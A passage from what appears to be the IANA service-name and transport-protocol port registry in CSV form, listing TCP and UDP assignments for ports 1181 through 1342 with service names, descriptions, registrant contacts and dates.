Proxy,[Steve_Glassman],[Steve_Glassman],,,,,, 3comnetman,1181,tcp,3Com Net Management,[Peter_White],[Peter_White],2004-11,,,,, 3comnetman,1181,udp,3Com Net Management,[Peter_White],[Peter_White],2004-11,,,,, accelenet,1182,tcp,AcceleNet Control,,,,,,,, accelenet-data,1182,udp,AcceleNet Data,[Peter_Lepeska],[Peter_Lepeska],2010-09-10,,,,, llsurfup-http,1183,tcp,LL Surfup HTTP,,,,,,,, llsurfup-http,1183,udp,LL Surfup HTTP,,,,,,,, llsurfup-https,1184,tcp,LL Surfup HTTPS,[Katy_Lynn_McCullough],[Katy_Lynn_McCullough],,,,,, llsurfup-https,1184,udp,LL Surfup HTTPS,[Katy_Lynn_McCullough],[Katy_Lynn_McCullough],,,,,, catchpole,1185,tcp,Catchpole port,[Christian_Catchpole],[Christian_Catchpole],2002-03,,,,, catchpole,1185,udp,Catchpole port,[Christian_Catchpole],[Christian_Catchpole],2002-03,,,,, mysql-cluster,1186,tcp,MySQL Cluster Manager,[Arjen_Lentz],[Arjen_Lentz],2004-11,,,,, mysql-cluster,1186,udp,MySQL Cluster Manager,[Arjen_Lentz],[Arjen_Lentz],2004-11,,,,, alias,1187,tcp,Alias Service,[Paul_Tokarchuk],[Paul_Tokarchuk],2004-11,,,,, alias,1187,udp,Alias Service,[Paul_Tokarchuk],[Paul_Tokarchuk],2004-11,,,,, hp-webadmin,1188,tcp,HP Web Admin,[Lance_Kind],[Lance_Kind],,,,,, hp-webadmin,1188,udp,HP Web Admin,[Lance_Kind],[Lance_Kind],,,,,, unet,1189,tcp,Unet Connection,[Anthony_Stahler],[Anthony_Stahler],2004-11,,,,, unet,1189,udp,Unet Connection,[Anthony_Stahler],[Anthony_Stahler],2004-11,,,,, commlinx-avl,1190,tcp,CommLinx GPS / AVL System,[Peter_Johnson],[Peter_Johnson],2004-11,,,,, commlinx-avl,1190,udp,CommLinx GPS / AVL System,[Peter_Johnson],[Peter_Johnson],2004-11,,,,, gpfs,1191,tcp,General Parallel File System,[Dave_Craft],[Dave_Craft],2004-11,,,,, gpfs,1191,udp,General Parallel File System,[Dave_Craft],[Dave_Craft],2004-11,,,,, caids-sensor,1192,tcp,caids sensors channel,[Gregory_Hostettler],[Gregory_Hostettler],2004-11,,,,, caids-sensor,1192,udp,caids sensors channel,[Gregory_Hostettler],[Gregory_Hostettler],2004-11,,,,, fiveacross,1193,tcp,Five Across Server,[Glenn_Reid],[Glenn_Reid],2004-11,,,,, fiveacross,1193,udp,Five Across Server,[Glenn_Reid],[Glenn_Reid],2004-11,,,,, openvpn,1194,tcp,OpenVPN,[James_Yonan],[James_Yonan],2004-11,,,,, openvpn,1194,udp,OpenVPN,[James_Yonan],[James_Yonan],2004-11,,,,, rsf-1,1195,tcp,RSF-1 clustering,[Dave_Hines],[Dave_Hines],2004-11,,,,, rsf-1,1195,udp,RSF-1 clustering,[Dave_Hines],[Dave_Hines],2004-11,,,,, netmagic,1196,tcp,Network Magic,[Nick_Holt],[Nick_Holt],2005-08,,,,, netmagic,1196,udp,Network Magic,[Nick_Holt],[Nick_Holt],2005-08,,,,, carrius-rshell,1197,tcp,Carrius Remote Access,[Gerry_Dubois],[Gerry_Dubois],2005-08,,,,, carrius-rshell,1197,udp,Carrius Remote Access,[Gerry_Dubois],[Gerry_Dubois],2005-08,,,,, cajo-discovery,1198,tcp,cajo reference discovery,[John_Catherino],[John_Catherino],2005-08,,,,, cajo-discovery,1198,udp,cajo reference discovery,[John_Catherino],[John_Catherino],2005-08,,,,, dmidi,1199,tcp,DMIDI,[Phil_Kerr],[Phil_Kerr],2002-02,,,,, dmidi,1199,udp,DMIDI,[Phil_Kerr],[Phil_Kerr],2002-02,,,,, scol,1200,tcp,SCOL,[Cryo_Networks],[Cryo_Networks],,,,,, scol,1200,udp,SCOL,[Cryo_Networks],[Cryo_Networks],,,,,, nucleus-sand,1201,tcp,Nucleus Sand Database Server,[James_Marsh],[James_Marsh],,,,,, nucleus-sand,1201,udp,Nucleus Sand Database Server,[James_Marsh],[James_Marsh],,,,,, caiccipc,1202,tcp,caiccipc,[Vince_Re],[Vince_Re],,,,,, caiccipc,1202,udp,caiccipc,[Vince_Re],[Vince_Re],,,,,, ssslic-mgr,1203,tcp,License Validation,,,,,,,, ssslic-mgr,1203,udp,License Validation,,,,,,,, ssslog-mgr,1204,tcp,Log Request Listener,[Eric_Bruno],[Eric_Bruno],,,,,, ssslog-mgr,1204,udp,Log Request Listener,[Eric_Bruno],[Eric_Bruno],,,,,, accord-mgc,1205,tcp,Accord-MGC,[Roni_Even],[Roni_Even],,,,,, accord-mgc,1205,udp,Accord-MGC,[Roni_Even],[Roni_Even],,,,,, anthony-data,1206,tcp,Anthony Data,[Paul_Dollemore],[Paul_Dollemore],,,,,, anthony-data,1206,udp,Anthony Data,[Paul_Dollemore],[Paul_Dollemore],,,,,, metasage,1207,tcp,MetaSage,[Peter_Anvelt],[Peter_Anvelt],,,,,, metasage,1207,udp,MetaSage,[Peter_Anvelt],[Peter_Anvelt],,,,,, seagull-ais,1208,tcp,SEAGULL AIS,[Lee_Breisacher],[Lee_Breisacher],,,,,, seagull-ais,1208,udp,SEAGULL AIS,[Lee_Breisacher],[Lee_Breisacher],,,,,, ipcd3,1209,tcp,IPCD3,[Mark_Ciskey],[Mark_Ciskey],,,,,, ipcd3,1209,udp,IPCD3,[Mark_Ciskey],[Mark_Ciskey],,,,,, eoss,1210,tcp,EOSS,[Robert_Armes],[Robert_Armes],,,,,, eoss,1210,udp,EOSS,[Robert_Armes],[Robert_Armes],,,,,, groove-dpp,1211,tcp,Groove DPP,[Ken_Moore],[Ken_Moore],,,,,, groove-dpp,1211,udp,Groove DPP,[Ken_Moore],[Ken_Moore],,,,,, lupa,1212,tcp,lupa,[Barney_Wolff],[Barney_Wolff],,,,,, lupa,1212,udp,lupa,[Barney_Wolff],[Barney_Wolff],,,,,, mpc-lifenet,1213,tcp,Medtronic/Physio-Control LIFENET,[Physio-Control_Inc],[Kevin_Drew],,2014-02-14,,,, mpc-lifenet,1213,udp,Medtronic/Physio-Control LIFENET,[Physio-Control_Inc],[Kevin_Drew],,2014-02-14,,,, kazaa,1214,tcp,KAZAA,[Ahti_Heinla],[Ahti_Heinla],,,,,, kazaa,1214,udp,KAZAA,[Ahti_Heinla],[Ahti_Heinla],,,,,, scanstat-1,1215,tcp,scanSTAT 1.0,[William_Scheding],[William_Scheding],,,,,, scanstat-1,1215,udp,scanSTAT 1.0,[William_Scheding],[William_Scheding],,,,,, etebac5,1216,tcp,ETEBAC 5,[Jean_Louis_Barbut],[Jean_Louis_Barbut],,,,,, etebac5,1216,udp,ETEBAC 5,[Jean_Louis_Barbut],[Jean_Louis_Barbut],,,,,, hpss-ndapi,1217,tcp,HPSS NonDCE Gateway,[Michael_Gleicher],[Michael_Gleicher],,,,,, hpss-ndapi,1217,udp,HPSS NonDCE Gateway,[Michael_Gleicher],[Michael_Gleicher],,,,,, aeroflight-ads,1218,tcp,AeroFlight-ADs,,,,,,,, aeroflight-ads,1218,udp,AeroFlight-ADs,,,,,,,, aeroflight-ret,1219,tcp,AeroFlight-Ret,[Eric_Johnson],[Eric_Johnson],,,,,, aeroflight-ret,1219,udp,AeroFlight-Ret,[Eric_Johnson],[Eric_Johnson],,,,,, qt-serveradmin,1220,tcp,QT SERVER ADMIN,[Chris_LeCroy],[Chris_LeCroy],,,,,, qt-serveradmin,1220,udp,QT SERVER ADMIN,[Chris_LeCroy],[Chris_LeCroy],,,,,, sweetware-apps,1221,tcp,SweetWARE Apps,[David_Dunetz],[David_Dunetz],,,,,, sweetware-apps,1221,udp,SweetWARE Apps,[David_Dunetz],[David_Dunetz],,,,,, nerv,1222,tcp,SNI R&D network,[Martin_Freiss],[Martin_Freiss],,,,,, nerv,1222,udp,SNI R&D network,[Martin_Freiss],[Martin_Freiss],,,,,, tgp,1223,tcp,TrulyGlobal Protocol,[Gur_Kimchi],[Gur_Kimchi],2008-05-20,,,,, tgp,1223,udp,TrulyGlobal Protocol,[Gur_Kimchi],[Gur_Kimchi],2008-05-20,,,,, vpnz,1224,tcp,VPNz,[Tom_Strack],[Tom_Strack],,,,,, vpnz,1224,udp,VPNz,[Tom_Strack],[Tom_Strack],,,,,, slinkysearch,1225,tcp,SLINKYSEARCH,[Desmond_Chan],[Desmond_Chan],,,,,, slinkysearch,1225,udp,SLINKYSEARCH,[Desmond_Chan],[Desmond_Chan],,,,,, stgxfws,1226,tcp,STGXFWS,[Tetsuya_Shioda],[Tetsuya_Shioda],,,,,, stgxfws,1226,udp,STGXFWS,[Tetsuya_Shioda],[Tetsuya_Shioda],,,,,, dns2go,1227,tcp,DNS2Go,[Mike_Courterier],[Mike_Courterier],,,,,, dns2go,1227,udp,DNS2Go,[Mike_Courterier],[Mike_Courterier],,,,,, florence,1228,tcp,FLORENCE,[Brian_Trammell],[Brian_Trammell],,,,,, florence,1228,udp,FLORENCE,[Brian_Trammell],[Brian_Trammell],,,,,, zented,1229,tcp,ZENworks Tiered Electronic Distribution,[Ty_Ellis],[Ty_Ellis],,,,,, zented,1229,udp,ZENworks Tiered Electronic Distribution,[Ty_Ellis],[Ty_Ellis],,,,,, periscope,1230,tcp,Periscope,[Kevin_Madden],[Kevin_Madden],,,,,, periscope,1230,udp,Periscope,[Kevin_Madden],[Kevin_Madden],,,,,, menandmice-lpm,1231,tcp,menandmice-lpm,[Sigfus_Magnusson],[Sigfus_Magnusson],,,,,, menandmice-lpm,1231,udp,menandmice-lpm,[Sigfus_Magnusson],[Sigfus_Magnusson],,,,,, first-defense,1232,tcp,Remote systems monitoring,[Nexum],[Michael_Fread],2012-09-21,,,,,Microsoft (unoffically) using 1232 first-defense,1232,udp,Remote systems monitoring,[Nexum],[Michael_Fread],2012-09-21,,,,,Microsoft (unoffically) using 1232 univ-appserver,1233,tcp,Universal App Server,[Tim_Sent],[Tim_Sent],,,,,, univ-appserver,1233,udp,Universal App Server,[Tim_Sent],[Tim_Sent],,,,,, search-agent,1234,tcp,Infoseek Search Agent,[Jackie_Wu],[Jackie_Wu],,,,,, search-agent,1234,udp,Infoseek Search Agent,[Jackie_Wu],[Jackie_Wu],,,,,, mosaicsyssvc1,1235,tcp,mosaicsyssvc1,[Brian_Matthews],[Brian_Matthews],,,,,, mosaicsyssvc1,1235,udp,mosaicsyssvc1,[Brian_Matthews],[Brian_Matthews],,,,,, bvcontrol,1236,tcp,bvcontrol,[Daniel_J_Walsh],[Daniel_J_Walsh],,,,,, bvcontrol,1236,udp,bvcontrol,[Daniel_J_Walsh],[Daniel_J_Walsh],,,,,, tsdos390,1237,tcp,tsdos390,[Ben_Pracht],[Ben_Pracht],,,,,, tsdos390,1237,udp,tsdos390,[Ben_Pracht],[Ben_Pracht],,,,,, hacl-qs,1238,tcp,hacl-qs,[Farid_Faez],[Farid_Faez],,,,,, hacl-qs,1238,udp,hacl-qs,[Farid_Faez],[Farid_Faez],,,,,, nmsd,1239,tcp,NMSD,[Yuri_Machkasov],[Yuri_Machkasov],,,,,, nmsd,1239,udp,NMSD,[Yuri_Machkasov],[Yuri_Machkasov],,,,,, instantia,1240,tcp,Instantia,[Ruth_Slater],[Ruth_Slater],,,,,, instantia,1240,udp,Instantia,[Ruth_Slater],[Ruth_Slater],,,,,, nessus,1241,tcp,nessus,[Jordan_Hrycaj],[Jordan_Hrycaj],,,,,, nessus,1241,udp,nessus,[Jordan_Hrycaj],[Jordan_Hrycaj],,,,,, nmasoverip,1242,tcp,NMAS over IP,[Hal_Henderson],[Hal_Henderson],,,,,, nmasoverip,1242,udp,NMAS over IP,[Hal_Henderson],[Hal_Henderson],,,,,, serialgateway,1243,tcp,SerialGateway,[Stephen_LaValley],[Stephen_LaValley],,,,,, serialgateway,1243,udp,SerialGateway,[Stephen_LaValley],[Stephen_LaValley],,,,,, isbconference1,1244,tcp,isbconference1,,,,,,,, isbconference1,1244,udp,isbconference1,,,,,,,, isbconference2,1245,tcp,isbconference2,[Arnold_Dittmann],[Arnold_Dittmann],,,,,, isbconference2,1245,udp,isbconference2,[Arnold_Dittmann],[Arnold_Dittmann],,,,,, payrouter,1246,tcp,payrouter,[David_Wilson],[David_Wilson],,,,,, payrouter,1246,udp,payrouter,[David_Wilson],[David_Wilson],,,,,, visionpyramid,1247,tcp,VisionPyramid,[Gavin_Hutchinson],[Gavin_Hutchinson],,,,,, visionpyramid,1247,udp,VisionPyramid,[Gavin_Hutchinson],[Gavin_Hutchinson],,,,,, hermes,1248,tcp,hermes,,,,,,,, hermes,1248,udp,hermes,,,,,,,, mesavistaco,1249,tcp,Mesa Vista Co,[Rick_LaBanca],[Rick_LaBanca],,,,,, mesavistaco,1249,udp,Mesa Vista Co,[Rick_LaBanca],[Rick_LaBanca],,,,,, swldy-sias,1250,tcp,swldy-sias,[Peter_E_Williams],[Peter_E_Williams],,,,,, swldy-sias,1250,udp,swldy-sias,[Peter_E_Williams],[Peter_E_Williams],,,,,, servergraph,1251,tcp,servergraph,[Lindsay_Morris],[Lindsay_Morris],,,,,, servergraph,1251,udp,servergraph,[Lindsay_Morris],[Lindsay_Morris],,,,,, bspne-pcc,1252,tcp,bspne-pcc,,,,,,,, bspne-pcc,1252,udp,bspne-pcc,,,,,,,, q55-pcc,1253,tcp,q55-pcc,[Prem_Tirilok],[Prem_Tirilok],,,,,, q55-pcc,1253,udp,q55-pcc,[Prem_Tirilok],[Prem_Tirilok],,,,,, de-noc,1254,tcp,de-noc,,,,,,,, de-noc,1254,udp,de-noc,,,,,,,, de-cache-query,1255,tcp,de-cache-query,,,,,,,, de-cache-query,1255,udp,de-cache-query,,,,,,,, de-server,1256,tcp,de-server,[Jeff_Burdette],[Jeff_Burdette],,,,,, de-server,1256,udp,de-server,[Jeff_Burdette],[Jeff_Burdette],,,,,, shockwave2,1257,tcp,Shockwave 2,[Dave_Simmons],[Dave_Simmons],,,,,, shockwave2,1257,udp,Shockwave 2,[Dave_Simmons],[Dave_Simmons],,,,,, opennl,1258,tcp,Open Network Library,,,,,,,, opennl,1258,udp,Open Network Library,,,,,,,, opennl-voice,1259,tcp,Open Network Library Voice,[Phil_Frisbie],[Phil_Frisbie],,,,,, opennl-voice,1259,udp,Open Network Library Voice,[Phil_Frisbie],[Phil_Frisbie],,,,,, ibm-ssd,1260,tcp,ibm-ssd,[Barry_Whyte],[Barry_Whyte],,,,,, ibm-ssd,1260,udp,ibm-ssd,[Barry_Whyte],[Barry_Whyte],,,,,, mpshrsv,1261,tcp,mpshrsv,[Makoto_Ikeyama],[Makoto_Ikeyama],,,,,, mpshrsv,1261,udp,mpshrsv,[Makoto_Ikeyama],[Makoto_Ikeyama],,,,,, qnts-orb,1262,tcp,QNTS-ORB,[Raghurama_Bhat],[Raghurama_Bhat],,,,,, qnts-orb,1262,udp,QNTS-ORB,[Raghurama_Bhat],[Raghurama_Bhat],,,,,, dka,1263,tcp,dka,[Chris_Griffin],[Chris_Griffin],,,,,, dka,1263,udp,dka,[Chris_Griffin],[Chris_Griffin],,,,,, prat,1264,tcp,PRAT,[Keith_Wood],[Keith_Wood],,,,,, prat,1264,udp,PRAT,[Keith_Wood],[Keith_Wood],,,,,, dssiapi,1265,tcp,DSSIAPI,[Jim_Turner],[Jim_Turner],,,,,, dssiapi,1265,udp,DSSIAPI,[Jim_Turner],[Jim_Turner],,,,,, dellpwrappks,1266,tcp,DELLPWRAPPKS,[David_Troeger],[David_Troeger],,,,,, dellpwrappks,1266,udp,DELLPWRAPPKS,[David_Troeger],[David_Troeger],,,,,, epc,1267,tcp,eTrust Policy Compliance,[Aaron_Stein],[Aaron_Stein],,,,,, epc,1267,udp,eTrust Policy Compliance,[Aaron_Stein],[Aaron_Stein],,,,,, propel-msgsys,1268,tcp,PROPEL-MSGSYS,[Bert_Van_der_Linden],[Bert_Van_der_Linden],,,,,, propel-msgsys,1268,udp,PROPEL-MSGSYS,[Bert_Van_der_Linden],[Bert_Van_der_Linden],,,,,, watilapp,1269,tcp,WATiLaPP,[Frederic_Weymann],[Frederic_Weymann],,,,,, watilapp,1269,udp,WATiLaPP,[Frederic_Weymann],[Frederic_Weymann],,,,,, opsmgr,1270,tcp,Microsoft Operations Manager,[Ashvin_Sanghvi],[Ashvin_Sanghvi],,,,,, opsmgr,1270,udp,Microsoft Operations Manager,[Ashvin_Sanghvi],[Ashvin_Sanghvi],,,,,, excw,1271,tcp,eXcW,[Norm_Freedman],[Norm_Freedman],,,,,, excw,1271,udp,eXcW,[Norm_Freedman],[Norm_Freedman],,,,,, cspmlockmgr,1272,tcp,CSPMLockMgr,[Ibtsam_Mahfouz],[Ibtsam_Mahfouz],,,,,, cspmlockmgr,1272,udp,CSPMLockMgr,[Ibtsam_Mahfouz],[Ibtsam_Mahfouz],,,,,, emc-gateway,1273,tcp,EMC-Gateway,[Rene_Fontaine],[Rene_Fontaine],,,,,, emc-gateway,1273,udp,EMC-Gateway,[Rene_Fontaine],[Rene_Fontaine],,,,,, t1distproc,1274,tcp,t1distproc,[Julian_Biddle],[Julian_Biddle],,,,,, t1distproc,1274,udp,t1distproc,[Julian_Biddle],[Julian_Biddle],,,,,, ivcollector,1275,tcp,ivcollector,,,,,,,, ivcollector,1275,udp,ivcollector,,,,,,,, ,1276,tcp,Reserved,,,,2014-05-23,,,,This entry has been removed on 2014-05-23. ,1276,udp,Reserved,,,,2014-05-23,,,,This entry has been removed on 2014-05-23. miva-mqs,1277,tcp,mqs,[Miva_Corporation],[Miva_Corporation],,,,,, miva-mqs,1277,udp,mqs,[Miva_Corporation],[Miva_Corporation],,,,,, dellwebadmin-1,1278,tcp,Dell Web Admin 1,,,,,,,, dellwebadmin-1,1278,udp,Dell Web Admin 1,,,,,,,, dellwebadmin-2,1279,tcp,Dell Web Admin 2,[Bridget_Navoda],[Bridget_Navoda],,,,,, dellwebadmin-2,1279,udp,Dell Web Admin 2,[Bridget_Navoda],[Bridget_Navoda],,,,,, pictrography,1280,tcp,Pictrography,[Takashi_Hoshino],[Takashi_Hoshino],,,,,, pictrography,1280,udp,Pictrography,[Takashi_Hoshino],[Takashi_Hoshino],,,,,, healthd,1281,tcp,healthd,[James_E_Housley],[James_E_Housley],,,,,, healthd,1281,udp,healthd,[James_E_Housley],[James_E_Housley],,,,,, emperion,1282,tcp,Emperion,[Claus_Thor_Barth],[Claus_Thor_Barth],,,,,, emperion,1282,udp,Emperion,[Claus_Thor_Barth],[Claus_Thor_Barth],,,,,, productinfo,1283,tcp,Product Information,,,,,,,, productinfo,1283,udp,Product Information,,,,,,,, iee-qfx,1284,tcp,IEE-QFX,[Mehrdad_Ashtiani],[Mehrdad_Ashtiani],2009-10-19,,,,, iee-qfx,1284,udp,IEE-QFX,[Mehrdad_Ashtiani],[Mehrdad_Ashtiani],2009-10-19,,,,, neoiface,1285,tcp,neoiface,[Jason_McManus],[Jason_McManus],,,,,, neoiface,1285,udp,neoiface,[Jason_McManus],[Jason_McManus],,,,,, netuitive,1286,tcp,netuitive,[JF_Huard],[JF_Huard],,,,,, netuitive,1286,udp,netuitive,[JF_Huard],[JF_Huard],,,,,, routematch,1287,tcp,RouteMatch Com,[Jeff_Jones],[Jeff_Jones],2005-11,,,,, routematch,1287,udp,RouteMatch Com,[Jeff_Jones],[Jeff_Jones],2005-11,,,,, navbuddy,1288,tcp,NavBuddy,[Eric_Hackman],[Eric_Hackman],,,,,, navbuddy,1288,udp,NavBuddy,[Eric_Hackman],[Eric_Hackman],,,,,, jwalkserver,1289,tcp,JWalkServer,,,,,,,, jwalkserver,1289,udp,JWalkServer,,,,,,,, winjaserver,1290,tcp,WinJaServer,,,,,,,, winjaserver,1290,udp,WinJaServer,,,,,,,, seagulllms,1291,tcp,SEAGULLLMS,[Lee_Breisacher],[Lee_Breisacher],,,,,, seagulllms,1291,udp,SEAGULLLMS,[Lee_Breisacher],[Lee_Breisacher],,,,,, dsdn,1292,tcp,dsdn,[Stanislaw_Skowronek],[Stanislaw_Skowronek],,,,,, dsdn,1292,udp,dsdn,[Stanislaw_Skowronek],[Stanislaw_Skowronek],,,,,, pkt-krb-ipsec,1293,tcp,PKT-KRB-IPSec,[Nancy_Davoust],[Nancy_Davoust],,,,,, pkt-krb-ipsec,1293,udp,PKT-KRB-IPSec,[Nancy_Davoust],[Nancy_Davoust],,,,,, cmmdriver,1294,tcp,CMMdriver,[Lutz_Karras],[Lutz_Karras],,,,,, cmmdriver,1294,udp,CMMdriver,[Lutz_Karras],[Lutz_Karras],,,,,, ehtp,1295,tcp,End-by-Hop Transmission Protocol,[Alexander_Bogdanov],[Alexander_Bogdanov],,,,,, ehtp,1295,udp,End-by-Hop Transmission Protocol,[Alexander_Bogdanov],[Alexander_Bogdanov],,,,,, dproxy,1296,tcp,dproxy,,,,,,,, dproxy,1296,udp,dproxy,,,,,,,, sdproxy,1297,tcp,sdproxy,[Raimond_Diederik],[Raimond_Diederik],,,,,, sdproxy,1297,udp,sdproxy,[Raimond_Diederik],[Raimond_Diederik],,,,,, lpcp,1298,tcp,lpcp,[Christian_Stredicke],[Christian_Stredicke],,,,,, lpcp,1298,udp,lpcp,[Christian_Stredicke],[Christian_Stredicke],,,,,, hp-sci,1299,tcp,hp-sci,[Kim_Scott],[Kim_Scott],,,,,, hp-sci,1299,udp,hp-sci,[Kim_Scott],[Kim_Scott],,,,,, h323hostcallsc,1300,tcp,H.323 Secure Call Control Signalling,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, h323hostcallsc,1300,udp,H.323 Secure Call Control Signalling,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, ci3-software-1,1301,tcp,CI3-Software-1,,,,,,,, ci3-software-1,1301,udp,CI3-Software-1,,,,,,,, ci3-software-2,1302,tcp,CI3-Software-2,[Kelli_Watson],[Kelli_Watson],,,,,, ci3-software-2,1302,udp,CI3-Software-2,[Kelli_Watson],[Kelli_Watson],,,,,, sftsrv,1303,tcp,sftsrv,[Robert_Frazier],[Robert_Frazier],,,,,, sftsrv,1303,udp,sftsrv,[Robert_Frazier],[Robert_Frazier],,,,,, boomerang,1304,tcp,Boomerang,[Bruce_Lueckenhoff],[Bruce_Lueckenhoff],,,,,, boomerang,1304,udp,Boomerang,[Bruce_Lueckenhoff],[Bruce_Lueckenhoff],,,,,, pe-mike,1305,tcp,pe-mike,[Stephen_Hemminger],[Stephen_Hemminger],,,,,, pe-mike,1305,udp,pe-mike,[Stephen_Hemminger],[Stephen_Hemminger],,,,,, re-conn-proto,1306,tcp,RE-Conn-Proto,[Sandeep_Singhal],[Sandeep_Singhal],,,,,, re-conn-proto,1306,udp,RE-Conn-Proto,[Sandeep_Singhal],[Sandeep_Singhal],,,,,, pacmand,1307,tcp,Pacmand,[Edward_T_O_Shea],[Edward_T_O_Shea],,,,,, pacmand,1307,udp,Pacmand,[Edward_T_O_Shea],[Edward_T_O_Shea],,,,,, odsi,1308,tcp,Optical Domain Service Interconnect (ODSI),[K_Arvind],[K_Arvind],,,,,, odsi,1308,udp,Optical Domain Service Interconnect (ODSI),[K_Arvind],[K_Arvind],,,,,, jtag-server,1309,tcp,JTAG server,[Andrew_Draper],[Andrew_Draper],,,,,, jtag-server,1309,udp,JTAG server,[Andrew_Draper],[Andrew_Draper],,,,,, husky,1310,tcp,Husky,[Mark_Zang],[Mark_Zang],,,,,, husky,1310,udp,Husky,[Mark_Zang],[Mark_Zang],,,,,, rxmon,1311,tcp,RxMon,[Javier_Jiminez],[Javier_Jiminez],,,,,, rxmon,1311,udp,RxMon,[Javier_Jiminez],[Javier_Jiminez],,,,,, sti-envision,1312,tcp,STI Envision,[Don_Stedman],[Don_Stedman],,,,,, sti-envision,1312,udp,STI Envision,[Don_Stedman],[Don_Stedman],,,,,, bmc-patroldb,1313,tcp,"BMC_PATROLDB IANA assigned this well-formed service name as a replacement for ""bmc_patroldb"".",[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc_patroldb,1313,tcp,BMC_PATROLDB,[Portnoy_Boxman],[Portnoy_Boxman],,,,,,"This entry is an alias to ""bmc-patroldb"". This entry is now historic, not usable for use with many common service discovery mechanisms." bmc-patroldb,1313,udp,"BMC_PATROLDB IANA assigned this well-formed service name as a replacement for ""bmc_patroldb"".",[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc_patroldb,1313,udp,BMC_PATROLDB,[Portnoy_Boxman],[Portnoy_Boxman],,,,,,"This entry is an alias to ""bmc-patroldb"". This entry is now historic, not usable for use with many common service discovery mechanisms." pdps,1314,tcp,Photoscript Distributed Printing System,[Les_Klein],[Les_Klein],,,,,, pdps,1314,udp,Photoscript Distributed Printing System,[Les_Klein],[Les_Klein],,,,,, els,1315,tcp,"E.L.S., Event Listener Service",[Jim_Cleppe],[Jim_Cleppe],,,,,, els,1315,udp,"E.L.S., Event Listener Service",[Jim_Cleppe],[Jim_Cleppe],,,,,, exbit-escp,1316,tcp,Exbit-ESCP,[Morten_Christensen],[Morten_Christensen],,,,,, exbit-escp,1316,udp,Exbit-ESCP,[Morten_Christensen],[Morten_Christensen],,,,,, vrts-ipcserver,1317,tcp,vrts-ipcserver,[Bruce_Hestand],[Bruce_Hestand],,,,,, vrts-ipcserver,1317,udp,vrts-ipcserver,[Bruce_Hestand],[Bruce_Hestand],,,,,, krb5gatekeeper,1318,tcp,krb5gatekeeper,[Patrick_Moore],[Patrick_Moore],,,,,, krb5gatekeeper,1318,udp,krb5gatekeeper,[Patrick_Moore],[Patrick_Moore],,,,,, amx-icsp,1319,tcp,AMX-ICSP,[Jeff_Burch],[Jeff_Burch],,,,,, amx-icsp,1319,udp,AMX-ICSP,[Jeff_Burch],[Jeff_Burch],,,,,, amx-axbnet,1320,tcp,AMX-AXBNET,[Jeff_Burch],[Jeff_Burch],,,,,, amx-axbnet,1320,udp,AMX-AXBNET,[Jeff_Burch],[Jeff_Burch],,,,,, pip,1321,tcp,PIP,[Gordon_Mohr],[Gordon_Mohr],,,,,, pip,1321,udp,PIP,[Gordon_Mohr],[Gordon_Mohr],,,,,, novation,1322,tcp,Novation,[Alan_Dano],[Alan_Dano],,,,,, novation,1322,udp,Novation,[Alan_Dano],[Alan_Dano],,,,,, brcd,1323,tcp,brcd,[Todd_Picquelle],[Todd_Picquelle],,,,,, brcd,1323,udp,brcd,[Todd_Picquelle],[Todd_Picquelle],,,,,, delta-mcp,1324,tcp,delta-mcp,[Quinton_Tormanen],[Quinton_Tormanen],,,,,, delta-mcp,1324,udp,delta-mcp,[Quinton_Tormanen],[Quinton_Tormanen],,,,,, dx-instrument,1325,tcp,DX-Instrument,[Walt_Modic],[Walt_Modic],,,,,, dx-instrument,1325,udp,DX-Instrument,[Walt_Modic],[Walt_Modic],,,,,, wimsic,1326,tcp,WIMSIC,[James_Brown],[James_Brown],,,,,, wimsic,1326,udp,WIMSIC,[James_Brown],[James_Brown],,,,,, ultrex,1327,tcp,Ultrex,[Tim_Walsh],[Tim_Walsh],,,,,, ultrex,1327,udp,Ultrex,[Tim_Walsh],[Tim_Walsh],,,,,, ewall,1328,tcp,EWALL,[Jeff_Busma],[Jeff_Busma],,,,,, ewall,1328,udp,EWALL,[Jeff_Busma],[Jeff_Busma],,,,,, netdb-export,1329,tcp,netdb-export,[Konstantinos_Kostis],[Konstantinos_Kostis],,,,,, netdb-export,1329,udp,netdb-export,[Konstantinos_Kostis],[Konstantinos_Kostis],,,,,, streetperfect,1330,tcp,StreetPerfect,[Michael_R_Young],[Michael_R_Young],,,,,, streetperfect,1330,udp,StreetPerfect,[Michael_R_Young],[Michael_R_Young],,,,,, intersan,1331,tcp,intersan,[Barry_H_Feild],[Barry_H_Feild],,,,,, intersan,1331,udp,intersan,[Barry_H_Feild],[Barry_H_Feild],,,,,, pcia-rxp-b,1332,tcp,PCIA RXP-B,[James_Dabbs],[James_Dabbs],,,,,, pcia-rxp-b,1332,udp,PCIA RXP-B,[James_Dabbs],[James_Dabbs],,,,,, passwrd-policy,1333,tcp,Password Policy,[Tonio_Pirotta],[Tonio_Pirotta],,,,,, passwrd-policy,1333,udp,Password Policy,[Tonio_Pirotta],[Tonio_Pirotta],,,,,, writesrv,1334,tcp,writesrv,[Marvin_Toungate],[Marvin_Toungate],,,,,, writesrv,1334,udp,writesrv,[Marvin_Toungate],[Marvin_Toungate],,,,,, digital-notary,1335,tcp,Digital Notary Protocol,[Wes_Doonan],[Wes_Doonan],,,,,, digital-notary,1335,udp,Digital Notary Protocol,[Wes_Doonan],[Wes_Doonan],,,,,, ischat,1336,tcp,Instant Service Chat,[Mike_Clise],[Mike_Clise],,,,,, ischat,1336,udp,Instant Service Chat,[Mike_Clise],[Mike_Clise],,,,,, menandmice-dns,1337,tcp,menandmice DNS,[Sigfus_Magnusson],[Sigfus_Magnusson],,,,,, menandmice-dns,1337,udp,menandmice DNS,[Sigfus_Magnusson],[Sigfus_Magnusson],,,,,, wmc-log-svc,1338,tcp,WMC-log-svr,[Scott_Anderson],[Scott_Anderson],,,,,, wmc-log-svc,1338,udp,WMC-log-svr,[Scott_Anderson],[Scott_Anderson],,,,,, kjtsiteserver,1339,tcp,kjtsiteserver,[Jason_Aubain],[Jason_Aubain],,,,,, kjtsiteserver,1339,udp,kjtsiteserver,[Jason_Aubain],[Jason_Aubain],,,,,, naap,1340,tcp,NAAP,[Henry_Haverinen],[Henry_Haverinen],,,,,, naap,1340,udp,NAAP,[Henry_Haverinen],[Henry_Haverinen],,,,,, qubes,1341,tcp,QuBES,[Eric_Grange],[Eric_Grange],,,,,, qubes,1341,udp,QuBES,[Eric_Grange],[Eric_Grange],,,,,, esbroker,1342,tcp,ESBroker,[Alexander_Medvinsky],[Alexander_Medvinsky],,,,,, 